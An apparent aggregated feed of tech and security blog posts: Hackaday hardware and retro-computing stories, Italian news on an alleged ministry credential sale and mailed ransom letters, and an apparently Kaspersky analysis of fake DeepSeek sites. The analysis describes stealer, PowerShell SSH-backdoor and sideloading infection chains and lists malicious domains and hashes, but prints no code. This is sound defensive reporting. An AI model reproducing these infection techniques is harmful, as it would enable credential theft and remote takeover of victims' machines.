The Strange Afterlife of the Xbox Kinect
The tale of the Microsoft Xbox Kinect is one of those sad situations where a great product was used in an application that turned out to be a bit of a flop and was discontinued because of it, despite its usefulness in other areas. This article from the Guardian is a quick read on how this handy depth camera has found other uses in somewhat niche areas, with not a computer game in sight.
It’s rather obvious that a camera that can generate a 3D depth map, in parallel with a 2D reference image, could have many applications beyond gaming, especially in the hands of us hackers. Potential uses include autonomous roving robots, 3D scanning, and complex user interfaces—there are endless possibilities. Artists producing interactive art exhibits would sit firmly in that last category, with the Kinect used in countless installations worldwide.
Apparently, the Kinect also has quite the following in ghost-hunting circles, which as many a dubious TV show would demonstrate, seem almost entirely filmed under IR light conditions. The Kinect’s IR-based structured light system is well-suited for these environments. Since its processing core runs a machine learning application specifically trained to track human figures, it’s no surprise that the device can pick up those invisible, pesky spirits hiding in the noise. Anyway, all of these applications depend on the used-market supply of Kinect devices, over a decade old, that can be found online and in car boot sales, which means one day, the Kinect really will die off, only to be replaced with specialist devices that cost orders of magnitude more to acquire.
In the unlikely event you’ve not encountered non-gaming applications for the Kinect, here’s an old project to scan an entire room to get you started. Just to be perverse, here’s a gaming application that Microsoft didn’t think of, and to round out, the bad news that Microsoft has really has abandoned the product.
Plastic Gear Repair
We’ve seen several methods of repairing plastic gears. After all, a gear is usually the same all the way around, so it is very tempting to duplicate a good part to replace a damaged part. That’s exactly what [repairman 101] does in the video below. He uses hot glue to form a temporary mold and casts a resin replacement in place with a part of a common staple as a metal reinforcement.
The process starts with using a hobby tool to remove even more of the damaged gear, making a V-shaped slot to accept the repair. The next step is to create a mold. To do that, he takes a piece of plastic and uses hot glue to secure it near a good part of the gear. Then, he fills the area with more hot glue and carefully removes it.
He uses WD-40 as a mold release. He moves the mold to the damaged area and cuts a bit of wire to serve as a support, using a soldering iron to melt it into the gear’s body. Some resin fills the mold, and once it is cured, the gear requires a little rework, but then it seems to work fine.
We would be tempted to use some 3D printing resin with UV curing, since we have it on hand. Then again, you could easily scan the gear, repair it digitally on the computer and just print a new one. That would work, too.
We’ve seen the same process using candle wax and epoxy. If you want to see an example of just printing an entire replacement, we’ve seen that, too.
youtube.com/embed/iNdAn-Fnc_Y?…
Custom Touchpad PCBs Without The Pain
Many of us use touch pads daily on our laptops, but rarely do we give much thought about what they really do. In fact they are a PCB matrix of conductive pads, with a controller chip addressing it and sensing the area of contact. Such a complex and repetitive pattern can be annoying to create by hand in an EDA package, so [Timonsku] has written a script to take away the work.
It starts with an OpenSCAD script (originally written by Texas Instruments, and released as open source) that creates a diamond grid, which can be edited to the required dimensions and resolution. This is then exported as a DXF file, and the magic begins in a Python script. After adjustment of variables to suit, it finishes with an Eagle-compatible board file which should be importable into other EDA packages.
We’ve never made a touchpad ourselves, but having dome other such repetitive PCB tasks we feel the pain of anyone who has. Looking at this project we’re struck by the thought that its approach could be adapted for other uses, so it’s one to file away for later.
This isn’t the first home-made touchpad project we’ve brought you.
Hackaday Europe 2025 Welcomes David Cuartielles, Announces Friday Night Bring-a-Hack
If you’re coming to Hackaday Europe 2025, you’ve got just over a week to get your bags packed and head on out to Berlin. Of course you have tickets already, right? And if you were still on the fence, let us tempt you with our keynote talk and some news about the Friday night meetup, sponsored by Crowd Supply.
But first, the keynote! You might know David Cuartielles as one of the four founders of Arduino. As a telecommunications engineer and doctor in design, he has devoted the last 25 years to experimenting with different educational models centered on the creation of interactive artifacts and platforms.
His talk, “What if the future (of electronics) was compostable?”, asks the question of whether or not we can take our physical projects and make them more ecologically friendly, and looking at Arduino’s approach of bio-degradable electronics and AI-enabled industrial technologies.
Bring a Hack
Come join us for informal Bring-a-Hack drinks starting up at 18:00 Friday night, May 14th, at the Jockel Biergarten, Ratiborstraße 14C. It’s always a great time to hang out a little bit while there are no presentations to feel like you’re missing out on. If you’ve got a project that fits in your backpack, brink it along and show us all. And if you just feel like relaxing over a beverage and some Biergarten fare, that’s great too! We’ll see you there.
Hacking Digital Calipers for Automated Measurements and Sorta-Micron Accuracy
We’ll take a guess that most readers have a set of digital calipers somewhere close to hand right now. The cheapest ones tend to be a little unsatisfying in the hand, a bit crusty and crunchy to use. But as [Matthias Wandel] shows us, these budget tools are quite hackable and a lot more precise than they appear to be.
[Matthias] is perhaps best known around these parts for making machine tools using mainly wood. It’s an unconventional material for things like the CNC router he loves to hate, but he makes it work through a combination of clever engineering and a willingness to work within the limits of the machine. To assess those limits, he connected some cheap digital calipers to a Raspberry Pi by hacking the serial interface that seems to be built into all of these tools. His particular calipers output a pair of 24-bit words over a synchronous serial connection a couple of times per second, but at a level too low to be read by the Pi. He solved this with a clever resistor ladder to shift the signals to straddle the 1.8 volt transition on the Pi, and after solving some noise problems with a few strategically placed capacitors and some software debouncing, he was gathering data on his Pi.
Although his setup was fine for the measurements he needed to make, [Matthias] couldn’t help falling down the rabbit hole of trying to milk better resolution from the calipers. On paper, the 24-bit output should provide micron-ish resolution, but sadly, the readings seem to fluctuate rapidly between two levels, making it difficult to obtain an average quickly enough to be useful. Still, it’s a good exercise, and overall, these hacks should prove handy for anyone who wants to dip a toe into automated metrology on a budget.
youtube.com/embed/0PA-KvnAwJM?…
Thanks to [Dragan] for the tip.
Why 56k Modems Relied On Digital Phone Lines You Didn’t Know We Had
If you came of age in the 1990s, you’ll remember the unmistakable auditory handshake of an analog modem negotiating its connection via the plain old telephone system. That cacophony of screeches and hisses was the result of careful engineering. They allowed digital data to travel down phone lines that were only ever built to carry audio—and pretty crummy audio, at that.
Speeds crept up over the years, eventually reaching 33.6 kbps—thought to be the practical limit for audio modems running over the telephone network. Yet, hindsight tells us that 56k modems eventually became the norm! It was all thanks to some lateral thinking which made the most of the what the 1990s phone network had to offer.
Breaking the Sound Barrier
The V.34 standard enabled transmission at up to 33.6 kbps, though many modems topped out at the lower level of 28.8 kpbs in the mid-1990s. Credit: Raimond Spekking, CC BY-SA 4.0
When traditional dial-up modems communicate, they encode digital bits as screechy analog tones that would then be carried over phone lines originally designed for human voices. It’s an imperfect way of doing things, but it was the most practical way of networking computers in the olden days. There was already a telephone line in just about every house and business, so it made sense to use them as a conduit to get computers online.
For years, speeds ticked up as modem manufacturers ratified new, faster modulation schemes. Speeds eventually reached 33.6 kbps which was believed to be near the theoretical maximum speed possible over standard telephone lines. This largely came down to the Shannon limit of typical phone lines—basically, with the amount of noise on a given line, and viable error correcting methods, there was a maximum speed at which data could reliably be transferred.
In the late 1990s, though, everything changed. 56 kbps modems started flooding the market as rival manufacturers vied to have the fastest, most capable product on offer. The speed limits had been smashed. The answer lay not in breaking Shannon’s Law, but in exploiting a fundamental change that had quietly transformed the telephone network without the public ever noticing.
Multiplexing Madness
Linecards in phone exchanges were responsible for turning analog signals into digital signals for further transmission through the phone network. Credit: Pdesousa359, CC BY-SA 3.0
In the late 1990s, most home users still connected to the telephone network through analog phone lines that used simple copper wires running to their houses, serving as the critical “last mile” connection. However, by this time, the rest of the telephone network had undergone a massive digital transformation. Telephone companies had replaced most of their long-distance trunks and switching equipment with digital technology. Once a home user’s phone line hit a central office, it was usually immediately turned into a digital signal for easier handling and long-distance transmission. Using the Digital Signal 0 (DS0) encoding, phone calls became digital with an 8 kHz sample rate using 8-bit pulse code modulation, working out to a maximum data rate of 64 kbps per phone line.
Traditionally, your ISP would communicate over the phone network much like you. Their modems would turn digital signals into analog audio, and pipe them into a regular phone line. That analog audio would then get converted to a DS0 digital signal again as it moved around the back-end of the phone network, and then back to analog for the last mile to the customer. Finally, the customer’s modem would take the analog signal and turn it back into digital data for the attached computer.
This fell apart at higher speeds. Modem manufacturers couldn’t find a way to modulate digital data into audio at 56 kbps in a way that would survive the DS0 encoding. It had largely been designed to transmit human voices successfully, and relied on non-linear encoding schemes that weren’t friendly to digital signals.
The breakthrough came when modem manufacturers realized that ISPs could operate differently from end users. By virtue of their position, they could work with telephone companies to directly access the phone network in a digital manner. Thus, the ISP would simply pipe a digital data directly into the phone network, rather than modulating it into audio first. The signal remained digital all the way until it reached the local exchange, where it would be converted into audio and sent down the phone line into the customer’s home. This eliminated a whole set of digital-to-analog and analog-to-digital conversions which were capping speeds, and let ISPs shoot data straight at customers at up to 56 kbps.The basic concept behind 56 kbps operation. So-called “digital modems” on the ISP side would squirt digital signals directly into the digital part of the phone network. These would then be modulated to analog just once at the exchange level to travel the last mile over the customer’s copper phone line. Credit: ITU, V.90 standard
This technique only worked in one direction, however. End users still had to use regular modems, which would have their analog audio output converted through DS0 at some point on its way back to the ISP. This kept upload speeds limited to 33.6 kbps.USRobotics was one of the innovators in the 56k modem space. Note the x2 branding on this SPORTSTER modem, denoing the company’s proprietary modulation method. Credit: Xiaowei, CC BY 3.0
The race to exploit this insight led to a minor format war. US Robotics developed its x2 standard, so named for being double the speed of 28k modems. Rival manufacturer Rockwell soon dropped the K56Flex standard, which levied the same trick to up speeds. ISPs quickly began upgrading to work with the faster modems, but consumers were confused with the competing standards.
The standoff ended in 1998 when the International Telecommnication Union (ITU) stepped in to create the V.90 standard. It was incompatible with both x2 and K56Flex, but soon became the industry norm.. This standardization finally allowed for interoperable 56K communications across vendors and ISPs. It was soon supplanted by the updated V.92 standard in 2000, which increased upload speeds to 48 kbps with some special upstream encoding tricks, while also adding new call-waiting and quick-connect features.
Final Hurrah
Despite the theoretical 56 kbps limit, actual connection speeds rarely reached such heights. Line quality and a user’s distance from the central office could degrade performance, and power limits mandated by government regulations made 53 kbps a more realistic peak speed in practice. The connection negotiation process users experienced – that distinctive modem “handshake” – often involved the modems testing line conditions and stepping down to the highest reliable speed. Despite the limitations, 56k modems soon became the norm as customers hoped to achieve a healthy speed boost over the older 33.6k and 28k modems of years past.
The 56K modem represents an elegant solution for a brief period in telecommunications history, when analog modems still ruled and broadband was still obscure and expensive. It was a technology born when modem manufacturers realized the phone network they were now working with was not the one they started with so many decades before. The average consumer may never have appreciated the nifty tricks that made the 56k modem work, but it was a smart piece of engineering that made the Internet ever so slightly more usable in those final years before DSL and cable began to dominate all.
Ministero dell’Interno Italiano sotto attacco? Accessi email in vendita nei forum underground!
Negli ultimi giorni, un utente del forum underground “BreachForums” ha pubblicato un annuncio riguardante la presunta vendita di accessi a caselle di posta elettronica appartenenti al Ministero dell’Interno italiano (dominio “@interno.it”).
La notizia, al momento non confermata da fonti istituzionali, desta particolare preoccupazione poiché, qualora fosse fondata, potrebbe comportare serie implicazioni a livello di sicurezza nazionale.
Dettagli del Possibile Breach
- Origine del Post: L’inserzione compare su un popolare forum underground in cui spesso circolano dati sottratti a enti governativi o aziende di rilievo. L’autore si identifica con il nickname “DataSec” e risulta avere un discreto livello di “reputazione” sulla piattaforma.
- Data di Pubblicazione: Il post è stato pubblicato il 3 marzo 2025 e, secondo i metadati del forum, è stato modificato una volta nella mattinata del 4 marzo.
- Oggetto della Vendita: “DataSec” asserisce di possedere credenziali e accessi interni a varie caselle di posta riconducibili al Ministero dell’Interno italiano (dominio “@interno.it”). Vengono offerte dietro compenso in criptovaluta, secondo un metodo di pagamento ricorrente nel panorama cybercriminale.
Attendibilità della Fonte
BreachForums è noto per ospitare annunci di compravendita di dati sottratti, spesso veritieri, ma non mancano casi di “fake listing” finalizzati a truffare possibili acquirenti. Attualmente, non risultano prove tangibili (come dump di dati o screenshot comprovanti la compromissione) che confermino la reale esistenza di tali credenziali.
Red Hot Cyber (RHC) continuerà a monitorare la situazione, prestando particolare attenzione a eventuali evoluzioni della discussione su BreachForums o alla comparsa di ulteriori elementi di prova in altri ambienti sotterranei e canali Telegram di settore.
- Pubblicazioni Future: Se il Ministero dell’Interno o altre istituzioni rilasceranno comunicati ufficiali, RHC ne darà tempestivo riscontro, dedicando un articolo specifico alle dichiarazioni e alle evidenze emergenti.
- Segnalazioni Anonymous: Chiunque fosse a conoscenza di dettagli aggiuntivi o potesse fornire riscontri utili, può contattarci attraverso la nostra mail crittografata, garantendo il massimo livello di riservatezza.
Conclusioni
La presunta vendita di accessi email legati al Ministero dell’Interno italiano costituisce un potenziale campanello d’allarme per la sicurezza istituzionale. Sebbene al momento le informazioni disponibili non permettano di confermare l’effettiva compromissione, è fondamentale mantenere un alto grado di vigilanza e procedere, se necessario, con verifiche tecniche e legali approfondite.
La prudenza e la trasparenza sono elementi essenziali in circostanze in cui anche solo il dubbio di una violazione può minare la fiducia dei cittadini e la credibilità delle istituzioni coinvolte. RHC resta a disposizione per ospitare eventuali comunicazioni ufficiali e fornire aggiornamenti, qualora emergano sviluppi significativi.
Questo articolo è stato redatto attraverso l’utilizzo della piattaforma Recorded Future, partner strategico di Red Hot Cyber e leader nell’intelligence sulle minacce informatiche, che fornisce analisi avanzate per identificare e contrastare le attività malevole nel cyberspazio.
L'articolo Ministero dell’Interno Italiano sotto attacco? Accessi email in vendita nei forum underground! proviene da il blog della sicurezza informatica.
The Future We Never Got, Running a Future We Got
If you’re familiar with Java here in 2025, the programming language you know is a world away from what Sun Microsystems planned for it in the mid-1990s. Back then it was key to a bright coffee-themed future of write-once-run-anywhere software, and aside from your web browser using it to run applications, your computer would be a diskless workstation running Java bytecode natively on the silicon.
What we got was slow and disappointing Java applets in web pages, and a line of cut-down SPARC-based JavaStations which did nothing to change the world. [FatSquirrel] has one of these machines, and a quarter century later, has it running NetBSD. It’s an interesting journey both into 1990s tech, and some modern-day networking tricks to make it happen.
These machines suffer as might be expected, from exhausted memory backup batteries. Fortunately once the serial port has been figured out they drop you into an OpenBoot prompt, which, in common with Apple machines in the ’90s, gives you a Forth interpreter. There’s enough info online to load the NVRAM with a config, and the machine stuttered into life. To do anything useful takes a network with RARP and NFS to serve an IP address and disk image respectively, which a modern Linux machine is quite happy to do. The resulting NetBSD machine maybe isn’t as useful as it could be, but at risk of angering any Java enthusiasts, perhaps it’s more useful than the original JavaOS.
We remember the promise of a Java-based future too, and tasted the bitter disappointment of stuttering Java applets in our web pages. However, given that so much of what we use now quietly runs Java in the background without our noticing it, perhaps the shade of Sun Microsystems had the last laugh after all. This isn’t the first ’90s machine that’s been taught new tricks here, some of them have received Java for the first time.
Trojans disguised as AI: Cybercriminals exploit DeepSeek’s popularity
Introduction
Among the most significant events in the AI world in early 2025 was the release of DeepSeek-R1 – a powerful reasoning large language model (LLM) with open weights. It’s available both for local use and as a free service. Since DeepSeek was the first service to offer access to a reasoning LLM to a wide audience, it quickly gained popularity, mirroring the success of ChatGPT. Naturally, this surge in interest also attracted cybercriminals.
While analyzing our internal threat intelligence data, we discovered several groups of websites mimicking the official DeepSeek chatbot site and distributing malicious code disguised as a client for the popular service.
Screenshot of the official DeepSeek website (February 2025)
Scheme 1: Python stealer and non-existent DeepSeek client
The first group of websites was hosted on domains whose names included DeepSeek model versions (V3 and R1):
- r1-deepseek[.]net;
- v3-deepseek[.]com.
As shown in the screenshot, the fake website lacks the option to start a chat – you can only download an application. However, the real DeepSeek doesn’t have an official Windows client.
Screenshot of the fake website
Clicking the “Get DeepSeek App” button downloads a small archive,
deep-seek-installation.zip. The archive contains the DeepSeek Installation.lnk file, which holds a URL.
At the time of publishing this research, the attackers had modified the fake page hosted on the
v3-deepseek[.]com domain. It now prompts users to download a client for the Grok model developed by xAI. We’re observing similar activity on the v3-grok[.]com domain as well. Disguised as a client is an archive named grok-ai-installation.zip, containing the same shortcut.
Executing the .lnk file runs a script located at the URL inside the shortcut:
This script downloads and unpacks an archive named
f.zip.
Contents of the unpacked archive
Next, the script runs the
1.bat file from the unpacked archive.
Contents of the BAT file
The downloaded archive also contains the
svchost.exe and python.py files. The first one is a legitimate file python.exe, renamed to mimic a Windows process to mislead users checking running applications in Task Manager.
It is used to launch
python.py, which contains the malicious payload (we’ve also seen this file named code.py). This is a stealer script written in Python that we haven’t seen in attacks before. If it’s executed successfully, the attackers obtain a wealth of data from the victim’s computer: cookies and session tokens from various browsers, login credentials for email, gaming, and other accounts, files with certain extensions, cryptocurrency wallet information, and more.
After collecting the necessary data, the script generates an archive and then either sends it to the stealer’s operators using a Telegram bot or uploads it to the Gofile file-sharing service. Thus, attempting to use the chatbot could result in the victim losing social media access, personal data, and even cryptocurrency. If corporate credentials are stored on the compromised device, entire organizations could also be at risk, leading to far more severe consequences.
Scheme 2: Malicious script and a million views
In another case, fake DeepSeek websites were found on the following domains:
- deepseek-pc-ai[.]com
- deepseek-ai-soft[.]com
We discovered the first domain back in early February, hosting the default Apache web server page with no content. Later, this domain displayed a new web page closely resembling the DeepSeek website. Notably, the fake site uses geofencing: when requests come from certain IP addresses, such as Russian ones, it returns a placeholder page filled with generic SEO text about DeepSeek (we believe this text may have been LLM-generated):
If the IP address and other request parameters meet the specified criteria, the server returns a page resembling DeepSeek. Users are prompted to download a client or start the chatbot, but either action results in downloading a malicious installer created using Inno Setup. Kaspersky products detect it as
Trojan-Downloader.Win32.TookPS.*.
When executed, this installer contacts malicious URLs to receive a command that will be executed using cmd. The most common command launches
powershell.exe with a Base64-encoded script as an argument. This script accesses an encoded URL to download another PowerShell script, which activates the built-in SSH service and modifies its configuration using the attacker’s keys, allowing remote access to the victim’s computer.
Part of the malicious PowerShell script
This case is notable because we managed to identify the primary vector for spreading the malicious links – posts on the social network X (formerly Twitter):
This post, directing users to
deepseek-pc-ai[.]com, was made from an account belonging to an Australian company. The post gained 1.2 million views and over a hundred reposts, most of which were probably made by bots – note the similar usernames and identifiers in their bios:
Some users in the comments dutifully point out the malicious nature of the link.
Links to
deepseek-ai-soft[.]com were also distributed through X posts, but at the time of investigation, they were only available in Google’s cache:
Scheme 3: Backdoors and attacks on Chinese users
We also encountered sites that directly distributed malicious executable files. One such file was associated with the following domains:
- app.delpaseek[.]com;
- app.deapseek[.]com;
- dpsk.dghjwd[.]cn.
These attacks target more technically advanced users – the downloaded malicious payload mimics Ollama, a framework for running LLMs such as DeepSeek on local hardware. This tactic reduces suspicion among potential victims. Kaspersky solutions detect this payload as
Backdoor.Win32.Xkcp.a.
The victim only needed to launch the “DeepSeek client” on their device to trigger the malware, which creates a KCP tunnel with predefined parameters.
Additionally, we observed attacks where a victim’s device downloaded the
deep_windows_Setup.zip archive, containing a malicious executable. The archive was downloaded from the following domains:
- deep-seek[.]bar;
- deep-seek[.]rest.
The malware in the archive is detected by Kaspersky solutions as
Trojan.Win32.Agent.xbwfho. This is an installer created with Inno Setup that uses DLL sideloading to load a malicious library. The DLL in turn extracts and loads into memory a payload hidden using steganography — a Farfli backdoor modification — and injects it into a process.
Both of these campaigns, judging by the language of the bait pages, are targeting Chinese-speaking users.
Conclusion
The nature of the fake websites described in this article suggests these campaigns are widespread and not aimed at specific users.
Cybercriminals use various schemes to lure victims to malicious resources. Typically, links to such sites are distributed through messengers and social networks, as seen in the example with the X post. Attackers may also use typosquatting or purchase ad traffic to malicious sites through numerous affiliate programs.
We strongly advise users to carefully check the addresses of websites they visit, especially if links come from unverified sources. This is especially important for highly popular services. In this case, it’s particularly noteworthy that DeepSeek doesn’t have a native Windows client. This isn’t the first time that cybercriminals have exploited the popularity of chatbots to distribute malware: they’ve previously targeted regular users with Trojans disguised as ChatGPT clients and developers with malicious packages in PyPI. Simple digital hygiene practices, combined with a cutting-edge security solution, can significantly reduce the risk of device infection and personal data loss.
Indicators of compromise
MD5
4ef18b2748a8f499ed99e986b4087518
155bdb53d0bf520e3ae9b47f35212f16
6d097e9ef389bbe62365a3ce3cbaf62d
3e5c2097ffb0cb3a6901e731cdf7223b
e1ea1b600f218c265d09e7240b7ea819
7cb0ca44516968735e40f4fac8c615ce
7088986a8d8fa3ed3d3ddb1f5759ec5d
Malicious domains
r1-deepseek[.]net
v3-deepseek[.]com
deepseek-pc-ai[.]com
deepseek-ai-soft[.]com
app.delpaseek[.]com
app.deapseek[.]com
dpsk.dghjwd[.]cn
deep-seek[.]bar
deep-seek[.]rest
v3-grok[.]com
Rackmount all the Things, Hi-Fi Edition
For those who love systems and structure, owning a 19-inch rack with just one slot filled is just not it. But what if the rest of your gear isn’t 19-inch? Well, then you go out and make it so, just like [Cal Bryant] did recently.
The goal was to consolidate multiple devices — DAC, input selector, streamer, and power routing — into a single 2U rackmount unit. His first attempts involved drilling 1U panels to attach gear with removable faceplates. That worked, but not all devices played nice. So his next step became a fully custom enclosure with CAD-modeled brackets and front panels.
OpenSCAD turned out to be a lifesaver, letting [Cal] design modular mounting solutions. Exporting proper circles for CNC turret punching however appeared to be a nightmare. It was FreeCAD to the rescue for post-processing. After some sanding and auto-shop painting, the final faceplate looked factory-made.
Custom switch boxes for power and audio routing keep things tidy, housing everything from USB to XLR inputs. A 4-pole switch even allows seamless swapping between his DAC and DJ controller, while UV-printed graphics bring the finishing touch to this project. For those looking to clean up their Hi-Fi setup (or just love modding for the sake of it), there’s a lot to learn from this build.
If buying a rack is not within your budget, you could start with well-known IKEA LACK furniture.
A TV With Contrast You Haven’t Seen For Years
It’s something of a surprise, should you own a CRT TV to go with your retrocomputers, when you use it to view a film or a TV show. The resolution may be old-fashioned, but the colors jump out at you, in a way you’d forgotten CRTs could do. You’re seeing black levels that LCD screens can’t match, and which you’ll only find comparable on a modern OLED TVs. Can an LCD screen achieve decent black levels? [DIY Perks] is here with a modified screen that does just that.
LCD screens work by placing a set of electronic polarizing filters in front of a bright light. Bright pixels let through the light, while black pixels, well, they do their best, but a bit of light gets through. As a result, they have washed-out blacks, and their images aren’t as crisp and high contrast as they should be. More modern LCDs use an array of LEDs as the backlight which they illuminate as a low resolution version of the image, an approach which improves matters but leaves a “halo” round bright spots.
The TV in the video below the break is an older LCD set, from which he removes the backlight and places the electronics in a stand. He can show an image on it by placing a lamp behind it, but he does something much cleverer. An old DLP projector with its color wheel removed projects a high-res luminance map onto the back of the screen, resulting in the coveted high contrast image. The final result uses a somewhat unwieldy mirror arrangement to shorten the distance for the projector, but we love this hack. It’s not the first backlight hack we’ve seen, but perhaps it give the best result.
youtube.com/embed/qXrn4MqY1Wo?…
Thanks [Keith Olson] for the tip!
Ptychography for High Resolution Microscopy
Nowadays, if you have a microscope, you probably have a camera of some sort attached. [Applied Science] shows how you can add an array of tiny LEDs and some compute power to produce high-resolution images — higher than you can get with the microscope on its own. The idea is to illuminate each LED in the array individually and take a picture. Then, an algorithm constructs a higher-resolution image from the collected images. You can see the results and an explanation in the video below.
You’d think you could use this to enhance a cheap microscope, but the truth is you need a high-quality microscope to start with. In addition, color cameras may not be usable, so you may have to find or create a monochrome camera.
The code for the project is on GitHub. The LEDs need to be close to a point source, so smaller is better, and that determines what kind of LEDs are usable. Of course, the LEDs go through the sample, so this is suitable for transmissive microscopes, not metallurgical ones, at least in the current incarnation.
You can pull the same stunt with electrons. Or blood.
youtube.com/embed/9KJLWwbs_cQ?…
Designing a Toy Conveyor Belt For Fun and Profit
[Hope This Works] wants to someday build a tiny factory line in the garage, with the intent of producing some simple widget down the line. But what is a tiny factory without tiny conveyor belts? Not a very productive one, that’s for sure.
As you may have noticed, this is designed after the transporter belts from the game Factorio. [Hope This Works] ultimately wants something functional that’s small enough to fit in one hand and has that transporter belt aesthetic going. He also saw this as a way to level up his CAD skills from approximately 1, and as you’ll see in the comprehensive video after the break, that definitely happened.
And so [Hope This Works] started by designing the all-important sprockets. He found a little eight-toothed number on McMaster-Carr and used the drawing for reference. From there, he designed the rest of the parts around the sprockets, adding a base so that it can sit on the desk or be held in the hand.
For now, this proof-of-concept is hand-cranked. We especially love that [Hope This Works] included a square hole for the crank handle to stand in when not in use. Be sure to check out the design/build video after the break to see it in action.
How happy would you be to see Factorio come up in a job interview?
youtube.com/embed/uJ_CC4abBj0?…
Thanks for the tip, [foamyguy]!
Piggyback Board Brings Touch Sensing to USB Soldering Iron
The current generation of USB-powered soldering irons have a lot going for them, chief among them being portability and automatic start and stop. But an iron that turns off in the middle of soldering a joint is a problem, one that this capacitive-touch replacement control module aims to fix.
The iron in question is an SJ1 from Awgem, which [DoganM95] picked up on Ali Express. It seems well-built, with a sturdy aluminum handle, a nice OLED display, and fast heat-up and cool-down. The problem is that the iron is triggered by motion, so if you leave it still for more than a second or two, such as when you’re soldering a big joint, it turns itself off. To fix that,[DoganM95] designed a piggyback board for the OEM controller with a TTP223 capacitive touch sensor. The board is carefully shaped to allow clearance for the existing PCB components and the heater cartridge terminals, and has castellated connections so it can connect to pads on the main board. You have to remove one MOSFET from the main board, but that’s about it for modifications. A nickel strip makes contact with the inside of the iron’s shell, turning it into the sensor plate for the TTP223.
[DoganM95] says that the BA6 variant of the chip is the one you want, as others have a 10-second timeout, which would defeat the purpose of the mod. It’s a very nice bit of design work, and we especially like how the mod board nests so nicely onto the OEM controller. It reminds us a little of those Quansheng handy-talkie all-band mods.
FLOSS Weekly Episode 823: TuxCare, 10 Years Without Rebooting!
This week, Jonathan Bennett and Aaron Newcomb talk with Joao Correia about TuxCare! What’s live patching, and why is it so hard? And how is this related to .NET 6? Watch to find out!
youtube.com/embed/tpSChIv7BOI?…
Did you know you can watch the live recording of the show right on our YouTube Channel? Have someone you’d like us to interview? Let us know, or contact the guest and have them contact us! Take a look at the schedule here.
play.libsyn.com/embed/episode/…
Direct Download in DRM-free MP3.
If you’d rather read along, here’s the transcript for this week’s episode.
Places to follow the FLOSS Weekly Podcast:
Theme music: “Newer Wave” Kevin MacLeod (incompetech.com)
Licensed under Creative Commons: By Attribution 4.0 License
hackaday.com/2025/03/05/floss-…
Haptic Displays Bring Sports To The Vision Impaired
When it comes to the majority of sports broadcasting, it’s all about the visual. The commentators call the plays, of course, but everything you’re being shown at home is on a screen. Similarly, if you’re in the stadium, it’s all about getting the best possible view from the best seats in the house.
Ultimately, the action can be a little harder to follow for the vision impaired. However, one company is working hard to make sports more accessible to everyone. Enter OneCourt, and their haptic sports display technology.
Haptic, Fantastic
If you can see, following just about any sport is relatively straightforward. Your eyes pick out the players and the lines on the field, and you can follow the ball or puck wherever it may land. Basically, interpreting a sport is just taking in a ton of positional data—the state of the game is represented by the position of the people and the fundamental game piece involved.
View this post on Instagram
But how do you represent the state of a game to somebody who can’t see? Audio helps, but it’s hard for even the fastest commentator to explain the entire state of the game all at once. As it turns out, touch can be a great tool in this regard. Imagine if you could place your hands down on a football field, and instinctively feel the position of all the players and the ball. That would be impractical, of course, because the field is too big. But if there was a small surface that represented the field in a touchable manner, that might just work.
This is precisely what OneCourt has created. The company realized that many modern professional sports already had high-quality data streams that represented the positions of players and the ball in real time. With the data on hand, they just needed a way to “display” it in a touchable, feelable form. To that end, they created a range of haptic displays that use vibrations to represent the action on the field in a compact tablet-like device. They receive game data over a 5G or WiFi link, and translate it into vibrations across a miniature replica of the playing surface.
youtube.com/embed/5tm8Vo9LnT0?…
OneCourt created a range of devices to suit different sports. A basketball version is marked out with raised lines matching those on the court, and trackable vibrations on the surface tell the user where the ball is going. The company has teamed up to offer devices to spectators going to see the Sacramento Kings and the Portland Trail Blazers at their home games throughout the season. Those visiting the stadium can request to use one of the devices during the game via guest services, and get a greater insight into the play.
The company has also demonstrated a similar device for use at baseball games, with the characteristic diamond laid out on the haptic surface. The devices were demoted at Dallas’s Glove Life Field last year.
View this post on Instagram
On a technological level, the hardware appears relatively straightforward. The OneCourt devices just pack an array of vibration motors into a rectangular surface, and they’re controlled based on a feed of gamestate data already collected by the professional leagues. However, for the vision impaired, it’s a gamechanger—allowing them to independently “watch” the game in far greater detail than before.The Portland Trail Blazers were the first NBA team to get on board with the OneCourt devices. Credit: Portland Trail Blazers, press release
For now, the devices are very much in a pilot rollout phase. OneCourt is running activations with individual sports teams to offer the devices to vision impaired spectators at their stadiums. However, the intention is that this technology could also be just as useful for fans tuning into a sports broadcast at home. The company hopes to start pre-orders for individual customers in the near future.
Accessible technology doesn’t always have to be highly advanced or complicated to be useful—or, indeed, fun! Devices like these can open up a whole new world of perception to those that otherwise might find sports difficult or frustrating to follow. Ultimately, that’s a good thing—and something we hope to see more of in future!
Is This The Oldest HD Video Online?
Take a look at this video from [Reely Interesting], showing scenes from traditional Japanese festivals. It’s well filmed, and as with any HD video, you can see real detail. But as you watch, you may see something a little out of the ordinary. It’s got noise, a little bit of distortion, and looking closely at the surroundings, it’s clearly from the 1980s. Something doesn’t add up, as surely we’d expect a video like this to be shot in glorious 525 line NTSC. In fact, what we’re seeing is a very rare demo reel from 1985, and it’s showing off the first commercial HDTV system. This is analogue video in 1035i, and its background as listed below the video makes for a very interesting story.
Most of us think of HDTV arriving some time in the 2000s when Blu-ray and digital broadcasting supplanted the NTSC or PAL systems. But in fact the Japanese companies had been experimenting since the 1960s, and these recordings are their first fruits. It’s been digitized from a very rare still-working Sony HDV-1000 reel-to-reel video recorder, and is thus possibly the oldest HD video viewable online. They’re looking for any HDV-1000 parts, should you happen to have one lying around. Meanwhile, the tape represents a fascinating window into a broadcast history very few of us had a chance to see back in the day.
This isn’t the first time we’ve touched on vintage reel-to-reel video.
youtube.com/embed/2vybIQ5o1yQ?…
Ora il Ransomware arriva per posta ordinaria! L’innovazione si firma Bianlian. Scopri i retroscena
Negli Stati Uniti è stata individuata una nuova frode: i criminali inviano false richieste di riscatto via posta per conto del gruppo BianLian.
Le buste indicano che il mittente è “BIANLIAN GROUP” e che l’indirizzo del mittente è un edificio per uffici a Boston, Massachusetts. Le lettere venivano inviate ai dirigenti aziendali e recavano la dicitura “Urgente, leggere immediatamente”. Secondo i timbri postali, la spedizione è avvenuta il 25 febbraio 2025 dall’ufficio postale di Boston.
Il contenuto delle lettere è focalizzato sul campo di attività del destinatario. Le lettere inviate alle organizzazioni sanitarie affermano che i dati dei pazienti e dei dipendenti sono stati rubati e le aziende che gestiscono gli ordini dei clienti sono minacciate relativamente alla divulgazione di informazioni sensibili dei clienti.
Nel testo si sostiene che gli aggressori hanno ottenuto l’accesso ai sistemi aziendali e hanno presumibilmente rubato file riservati, tra cui bilanci, documenti fiscali e dati personali dei dipendenti.
Contenuto della lettera per una delle aziende (Guidepoint Security)
